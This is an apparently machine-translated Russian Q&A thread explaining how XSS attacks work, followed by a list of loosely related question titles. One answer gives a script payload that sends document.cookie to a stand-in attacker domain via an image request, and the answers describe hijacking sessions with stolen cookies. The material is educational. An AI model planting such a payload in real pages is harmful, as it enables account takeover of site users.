Итак, предотвращение веб-сайта от атаки XSS очень просто, вам просто нужно использовать функцию htmlspecialchars
, и вы хороши.
Но если разработчик забыл использовать его, что может сделать злоумышленник/хакер? Он может получить ваш session_id, не так ли? И вот вопрос. Что он может с этим сделать?
спасибо.Как работает XSS-атака?
ответ
Таким образом, предотвращение веб-сайта от атаки XSS очень просто, вам просто нужно использовать функцию htmlspecialchars, и вы хороши.
Право. Используйте его в любом месте, когда вы собираетесь повторно отображать управляемый пользователем вход. Это касается всех частей HTTP-запроса: заголовков, тела и параметров.
Но если разработчик забыл использовать его, что может сделать злоумышленник/хакер?
S/he может вставить вредоносный HTML/script. Например.следующее в некоторых сообщений/комментариев на веб-странице:
<script>document.write('<img src="http://hackersdomain.com/fake.gif?' + escape(document.cookie) + '" width=0 height=0>');</script>
выше будет запрашивать изображение из mailicious домена вместе с документом печенье в качестве строки запроса.
Он может получить ваш session_id, не так ли? И вот вопрос. Что он может с этим сделать?
Идентификатор сеанса хранится в файле cookie. Как только хакер уведомляется о том, что изображение было запрошено с файлом cookie в строке запроса, все, что ему нужно сделать, это просто отредактировать cookie браузера, чтобы включить тот же идентификатор сеанса, чтобы войти в систему как исходный пользователь. Это, очевидно, очень опасно, если исходный пользователь является администратором сайта.
Начать чтение о XSS здесь: http://en.wikipedia.org/wiki/XSS и http://en.wikipedia.org/wiki/Cross-site_scripting
Атакующий А получает член B для доступа к сайту C с учетными данными Б через тщательно выстроенной URI в.
A может затем запустить любой JS, который им нравится на C, используя учетные данные B.
Это позволяет им:
- Present любую информацию, которую они хотели бы B, как если бы он пришел из C
- Получить браузер B, чтобы отправить любую информацию, которую они хотят от C до A
- счета Реквизиты
- Личные данные
- Отправить любую инструкцию на сайт C, как если бы он пришел из
- Опубликовать это спам-
- перевести деньги на этот счет
- Купить это очень дорого книга
Если у вас есть уязвимость XSS на вашем веб-сайт, тогда хакер может вставить любой HTML-код на страницу, включая тег <script>
. Если я войду на ваш веб-сайт и перейду на атакующую страницу, в моем браузере будет запущен JavaScript, вставленный хакером, и сделайте мой браузер так, как планировал хакер.
Как отправить запрос POST на ваш сервер, чтобы изменить мой пароль, а затем загрузить URL-адрес с сервера хакера, чтобы уведомить его о моем номере учетной записи, чтобы он мог войти в систему и украсть мою учетную запись.
Это лучший explenation из XSS я когда-либо столкнулся: Flash Animation Example
Вот Second Video
- 1. Как работает/работает «after_filter»?
- 2. как работает fork() (работает)
- 3. Как работает Arrays.asList (...).() Работает?
- 4. Как работает $ (function() {}); работает?
- 5. Как работает Mockito.when(). Return() работает
- 6. Как это работает, если работает?
- 7. Как работает коммутатор Первоначально работает
- 8. Как работает stylesheet_link_tag: все работает?
- 9. Как работает группа и работает
- 10. Как работает .__ len __() работает здесь?
- 11. Как работает & работает в рельсах?
- 12. Как работает `===`?
- 13. Как работает «|| =»?
- 14. Как работает Jenkins Maven Плагин работает
- 15. Как работает forge.tabbar? Документированный пример не работает
- 16. Как работает padding-top: 100% работает?
- 17. Как работает InsertionMode.Replace работает на Ajax.BeginForm
- 18. Как работает ионная подача - все работает?
- 19. Как работает. = Работает в этом коде?
- 20. slideDown не работает или работает как .show
- 21. Как работает @override работает на Java?
- 22. Как работает jquery $ ('# some_id'). Текст ('some_text') работает?
- 23. Как работает в этом случае findAllBy * работает?
- 24. Как работает toString.replaceВсе работает на Java?
- 25. Как работает() работает в актерской системе Акка?
- 26. Как работает/работает кеширование GAE/Endpoints?
- 27. Как работает cv :: TermCriteria работает в opencv?
- 28. Как работает IPython? оператор действительно работает?
- 29. Ajax если не работает. Как это работает?
- 30. Как узнать, как работает библиотека?
Эй, что, если я использую 'ini_set ('session.use_only_cookies', 1);' в моем скрипт? Тем не менее, 'document.cookie' будет работать? –